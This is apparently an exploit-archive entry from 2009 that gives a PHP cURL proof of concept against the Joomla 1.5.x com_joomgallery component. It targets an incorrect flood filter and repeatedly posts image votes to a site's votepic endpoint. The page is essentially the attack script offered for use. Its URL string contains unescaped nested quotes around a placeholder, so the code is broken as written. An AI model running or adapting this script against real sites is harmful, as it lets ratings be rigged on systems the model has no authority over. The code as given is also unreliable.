[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Joomla 1.5.x com_joomgallery&func Incorrect Flood Filter
# Published : 2009-12-04
# Author : Jbyte
# Previous Title : Achievo 1.4.2 Arbitrary File Upload
# Next Title : BM Classifieds Ads SQL Injection Vulnerability


<?php
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://server/index.php?option=com_joomgallery&func=votepic&id="here id de voto"&Itemid=85");
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_POSTFIELDS,"imgvote=5&Votar%21=Votar%21");
curl_exec($ch);

curl_close($ch);
?>